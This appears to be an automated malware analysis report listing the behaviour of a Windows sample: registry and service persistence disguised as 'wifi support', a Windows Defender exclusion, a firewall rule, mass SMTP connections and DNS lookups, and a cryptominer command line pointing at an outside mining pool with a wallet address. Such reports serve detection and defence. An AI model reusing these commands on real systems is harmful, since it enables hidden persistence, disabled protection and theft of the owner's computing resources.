Technical Information
- [<HKLM>\System\CurrentControlSet\Services\lafzsohd] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\lafzsohd] 'ImagePath' = '%WINDIR%\SysWOW64\lafzsohd\ernsscwt.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\lafzsohd] 'ImagePath' = '%WINDIR%\SysWOW64\lafzsohd\ernsscwt.exe'
- 'lafzsohd' %WINDIR%\SysWOW64\lafzsohd\ernsscwt.exe /d"<Full path to file>"
- 'lafzsohd' %WINDIR%\SysWOW64\lafzsohd\ernsscwt.exe
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\lafzsohd' = '00000000'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\ernsscwt.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
- from %TEMP%\ernsscwt.exe to %WINDIR%\syswow64\lafzsohd\ernsscwt.exe
- 'mi##########m.mail.protection.outlook.com':25
- 'sm##.sfh.med.sa':25
- 'mx#######003.gslb.pphosted.com':25
- 'ip.####y.hacklix.com':443
- 'mx#######a02.gslb.pphosted.com':25
- 'mx#######401.gslb.pphosted.com':25
- 'ma#######xcite.roc2.bluetie.com':25
- 'mx#######f01.gslb.pphosted.com':25
- 'mx#######702.gslb.pphosted.com':25
- 'mx.####.pelconsip.aruba.it':25
- 'au#####ver.mojang.com':443
- 'mx#.free.fr':25
- 'sm####n.libero.it':25
- 'mx#######102.gslb.pphosted.com':25
- 'mx##.##il.icloud.com':25
- 'sm####.laposte.net':25
- 'mx###.##il.am0.yahoodns.net':25
- 'mx#######b01.gslb.pphosted.com':25
- 'mx##.#mig.gmx.net':25
- 'mx###02.web.de':25
- 'mx#######002.gslb.pphosted.com':25
- 'ma##.mkcorp.com':25
- 'mx##.mail.com':25
- '20#.#38.180.112':25
- 'mx.##s.untd.com':25
- 'mx#.####te.mail2world.com':25
- 'mx#.#angia.biz':25
- 'mx#.vtx.ch':25
- 'in.###.trendmicro.com':25
- 'ma##.b-io.co':25
- 'alt1.aspmx.l.google.com':25
- 'mx#######b02.gslb.pphosted.com':25
- 'mx#######607.gslb.pphosted.com':25
- 'mx######1cb01.pphosted.com':25
- 'ma####elay.cuny.edu':25
- 'ma##.gapd.es':25
- 'mx#######301.gslb.pphosted.com':25
- 'mx#######f02.gslb.pphosted.com':25
- 'ff######x-vip1.prodigy.net':25
- 'mx#######e01.gslb.pphosted.com':25
- 'mx#######e02.gslb.pphosted.com':25
- 'ma####.scppool.com':25
- 'in###gram.com':443
- 'pa####x.above.com':25
- 'ma######.safrangroup.com':25
- 'cx#.##.#.cloudfilter.net':25
- 'mx.##.##mail.iss.as9143.net':25
- 'li######.#lc.protection.outlook.com':25
- 'mx##.###us-vadesecure.net':25
- 'mx#######c01.gslb.pphosted.com':25
- 'mx#######501.gslb.pphosted.com':25
- 'ho#########.olc.protection.outlook.com':25
- 'mx#.qq.com':25
- 'mx#######a01.gslb.pphosted.com':25
- 'mx#######001.gslb.pphosted.com':25
- 'mx#.#ate.com':25
- 'mx#######801.gslb.pphosted.com':25
- 'fa###ool.xyz':10060
- 'mx####.##il.gm0.yahoodns.net':25
- 'mt##.##0.yahoodns.net':25
- 'gmail-smtp-in.l.google.com':25
- 'alt1.gmail-smtp-in.l.google.com':25
- '19#.#6.146.40':486
- '19#.#1.3.129':443
- 'mx#######503.gslb.pphosted.com':25
- 'mx#######101.gslb.pphosted.com':25
- 'sm###in.sfr.fr':25
- 'mx#######601.gslb.pphosted.com':25
- 'ma##.#ailcatch.com':25
- 'mx###.##stedmxserver.com':25
- 'mx#######c04.gslb.pphosted.com':25
- 'mx#.#omcast.net':25
- 'am####03.aig.com':25
- 'ms#####.##c.protection.outlook.com':25
- 'ma##.goctii.com':25
- 'ASPMX.L.GOOGLE.com':25
- 'mx.##timum.net':25
- 'google.com':80
- '5.##.37.41':430
- '19#.#62.246.7':430
- '95.##6.195.92':430
- '19#.#6.146.41':430
- '19#.#6.146.43':430
- '19#.#6.146.42':430
- 'eu#.###.#rotection.outlook.com':25
- 'mx#######901.gslb.pphosted.com':25
- 'mx#######d01.gslb.pphosted.com':25
- 'ma##.#-email.net':25
- 'mt###.uoa.gr':25
- http://www.google.com/
- '19#.#1.3.129':443
- 'alt4.gmail-smtp-in.l.google.com':25
- 'mx###.##stedmxserver.com':25
- 'ma##.#ailcatch.com':25
- 'ma##.#-email.net':25
- 'in###gram.com':443
- 'mx###.##il.am0.yahoodns.net':25
- 'mx.##timum.net':25
- 'ms#####.##c.protection.outlook.com':25
- 'sm####.laposte.net':25
- 'ip.####y.hacklix.com':443
- 'sm##.sfh.med.sa':25
- 'ff######x-vip1.prodigy.net':25
- 'ma##.gapd.es':25
- 'in.###.trendmicro.com':25
- 'mx#.#angia.biz':25
- 'au#####ver.mojang.com':443
- 'mx#######f01.gslb.pphosted.com':25
- 'ASPMX.L.GOOGLE.com':25
- '19#.#62.246.7':430
- '95.##6.195.92':430
- 'alt1.gmail-smtp-in.l.google.com':25
- 'gmail-smtp-in.l.google.com':25
- 'fa###ool.xyz':10060
- 'mx####.##il.gm0.yahoodns.net':25
- 'mt##.##0.yahoodns.net':25
- 'mx#.qq.com':25
- 'ho#########.olc.protection.outlook.com':25
- '19#.#6.146.40':486
- 'alt2.gmail-smtp-in.l.google.com':25
- 'li######.#lc.protection.outlook.com':25
- 'mx##.###us-vadesecure.net':25
- 'eu#.###.#rotection.outlook.com':25
- '19#.#6.146.42':430
- '19#.#6.146.43':430
- '5.##.37.41':430
- '19#.#6.146.41':430
- 'alt3.gmail-smtp-in.l.google.com':25
- 'mx#.vtx.ch':25
- '20#.#38.180.112':25
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK nu.com
- DNS ASK mx#######401.gslb.pphosted.com
- DNS ASK gs#.com
- DNS ASK mx#######a02.gslb.pphosted.com
- DNS ASK ip.####y.hacklix.com
- DNS ASK co######bankeratlanta.com
- DNS ASK sp#.#ony.com
- DNS ASK sc##us.com
- DNS ASK ex##te.com
- DNS ASK ma#######xcite.roc2.bluetie.com
- DNS ASK mt#.com
- DNS ASK is####ul.ddb.com
- DNS ASK sf#.med.sa
- DNS ASK sm##.sfh.med.sa
- DNS ASK co###e.roma.it
- DNS ASK mx.####.pelconsip.aruba.it
- DNS ASK pl###tsox.com
- DNS ASK gm#.at
- DNS ASK pm##a.com
- DNS ASK we###fargo.com
- DNS ASK mx#######003.gslb.pphosted.com
- DNS ASK mk##rp.com
- DNS ASK mx#######002.gslb.pphosted.com
- DNS ASK ch####rcab-det.com
- DNS ASK mx##.##il.icloud.com
- DNS ASK jo###eere.com
- DNS ASK ap#####biosystems.com
- DNS ASK mx#######102.gslb.pphosted.com
- DNS ASK li##ro.it
- DNS ASK sm####n.libero.it
- DNS ASK al###adsl.fr
- DNS ASK au#####ver.mojang.com
- DNS ASK sm####.laposte.net
- DNS ASK mx#######f01.gslb.pphosted.com
- DNS ASK mx#.free.fr
- DNS ASK pi####lyingj.com
- DNS ASK ui##ho.edu
- DNS ASK th###e.com.au
- DNS ASK wa##r.co.nz
- DNS ASK fa####oncapital.com
- DNS ASK sa##.org
- DNS ASK mx#######702.gslb.pphosted.com
- DNS ASK ya##o.it
- DNS ASK we#.de
- DNS ASK mx###02.web.de
- DNS ASK sh###erfly.com
- DNS ASK ma##.mkcorp.com
- DNS ASK ke###metal.com
- DNS ASK an##og.com
- DNS ASK ni##.net
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK hm##.org
- DNS ASK ma##.b-io.co
- DNS ASK at##ods.com
- DNS ASK in.###.trendmicro.com
- DNS ASK mx#######607.gslb.pphosted.com
- DNS ASK li#e.it
- DNS ASK mx#######b02.gslb.pphosted.com
- DNS ASK ee#.ch
- DNS ASK sh##tel.net
- DNS ASK mx#.#angia.biz
- DNS ASK ex##te.it
- DNS ASK mx#.####te.mail2world.com
- DNS ASK ju##.com
- DNS ASK mx.##s.untd.com
- DNS ASK pa####x.above.com
- DNS ASK li#e.nl
- DNS ASK rc#.com
- DNS ASK mx#.vtx.ch
- DNS ASK mx######1cb01.pphosted.com
- DNS ASK in###mmicro.com
- DNS ASK mx##.mail.com
- DNS ASK ma####.scppool.com
- DNS ASK fo#.com
- DNS ASK ap.#ony.com
- DNS ASK va###ard.com.au
- DNS ASK mx#######e02.gslb.pphosted.com
- DNS ASK re##m.com
- DNS ASK mx#######e01.gslb.pphosted.com
- DNS ASK am###tech.net
- DNS ASK ff######x-vip1.prodigy.net
- DNS ASK sc##ool.com
- DNS ASK ch###-tech.com
- DNS ASK do###ods.com
- DNS ASK mx#######301.gslb.pphosted.com
- DNS ASK ga#d.es
- DNS ASK ma##.gapd.es
- DNS ASK wt###tebk.com
- DNS ASK ma##.cuny.edu
- DNS ASK ma####elay.cuny.edu
- DNS ASK am###trade.com
- DNS ASK la##ste.net
- DNS ASK mx#######f02.gslb.pphosted.com
- DNS ASK me.com
- DNS ASK ya##o.de
- DNS ASK no###.teradyne.com
- DNS ASK gm#.net
- DNS ASK rc#.it
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK gm##l.com
- DNS ASK alt3.gmail-smtp-in.l.google.com
- DNS ASK cb##.com
- DNS ASK mx#######c01.gslb.pphosted.com
- DNS ASK ad##s12.org
- DNS ASK ho##ail.com
- DNS ASK qq.com
- DNS ASK alt2.gmail-smtp-in.l.google.com
- DNS ASK ea###link.net
- DNS ASK nt###rld.com
- DNS ASK mx.##.##mail.iss.as9143.net
- DNS ASK ce###ese.com
- DNS ASK mx#######101.gslb.pphosted.com
- DNS ASK ta###tbase.com
- DNS ASK mx#######001.gslb.pphosted.com
- DNS ASK ym##l.com
- DNS ASK mx##.###us-vadesecure.net
- DNS ASK li##.com
- DNS ASK li######.#lc.protection.outlook.com
- DNS ASK mx#.qq.com
- DNS ASK mx#######a01.gslb.pphosted.com
- DNS ASK sf#.fr
- DNS ASK ya##o.com
- DNS ASK alt1.gmail-smtp-in.l.google.com
- DNS ASK gmail-smtp-in.l.google.com
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK ve##zon.net
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK fa###ool.xyz
- DNS ASK az##n.co.uk
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK mx#######801.gslb.pphosted.com
- DNS ASK fs#.edu
- DNS ASK mx#######503.gslb.pphosted.com
- DNS ASK ya##o.co.nz
- DNS ASK na##.com
- DNS ASK mx#.#ate.com
- DNS ASK ny#.edu
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK ph##.uoa.gr
- DNS ASK ar###cmail.com
- DNS ASK sm###in.sfr.fr
- DNS ASK mx#######d01.gslb.pphosted.com
- DNS ASK mx###.##stedmxserver.com
- DNS ASK go###email.com
- DNS ASK ma###atch.com
- DNS ASK ma##.#ailcatch.com
- DNS ASK co#.net
- DNS ASK cx#.##.#.cloudfilter.net
- DNS ASK ho##op.com
- DNS ASK th####nreuters.com
- DNS ASK ma##.#-email.net
- DNS ASK sb###oba.net
- DNS ASK ma######.safrangroup.com
- DNS ASK gm#.de
- DNS ASK mx##.#mig.gmx.net
- DNS ASK be##buy.com
- DNS ASK mx#######b01.gslb.pphosted.com
- DNS ASK ya##o.fr
- DNS ASK mx###.##il.am0.yahoodns.net
- DNS ASK td#.com
- DNS ASK ai###lle.com
- DNS ASK ho#########.olc.protection.outlook.com
- DNS ASK in###gram.com
- DNS ASK mx#######c04.gslb.pphosted.com
- DNS ASK mx#.#omcast.net
- DNS ASK co##ast.net
- DNS ASK me###t.ucla.edu
- DNS ASK mx#######901.gslb.pphosted.com
- DNS ASK ho##ail.it
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK op###line.net
- DNS ASK google.com
- DNS ASK mx.##timum.net
- DNS ASK br#####nk12students.com
- DNS ASK st##art.com
- DNS ASK ASPMX.L.GOOGLE.com
- DNS ASK ma##.goctii.com
- DNS ASK ms#.com
- DNS ASK ms#####.##c.protection.outlook.com
- DNS ASK wj#.com
- DNS ASK co##iere.it
- DNS ASK alt4.gmail-smtp-in.l.google.com
- DNS ASK ai#.com
- DNS ASK am####03.aig.com
- DNS ASK ao#.com
- DNS ASK ce#####transportint.com
- DNS ASK ch#####schoolsusa.com
- DNS ASK mx#######601.gslb.pphosted.com
- DNS ASK mt###.uoa.gr
- '%WINDIR%\syswow64\lafzsohd\ernsscwt.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\lafzsohd\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\ernsscwt.exe" %WINDIR%\SysWOW64\lafzsohd\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create lafzsohd binPath= "%WINDIR%\SysWOW64\lafzsohd\ernsscwt.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description lafzsohd "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start lafzsohd' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\lafzsohd\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\ernsscwt.exe" %WINDIR%\SysWOW64\lafzsohd\
- '%WINDIR%\syswow64\sc.exe' create lafzsohd binPath= "%WINDIR%\SysWOW64\lafzsohd\ernsscwt.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description lafzsohd "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start lafzsohd
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half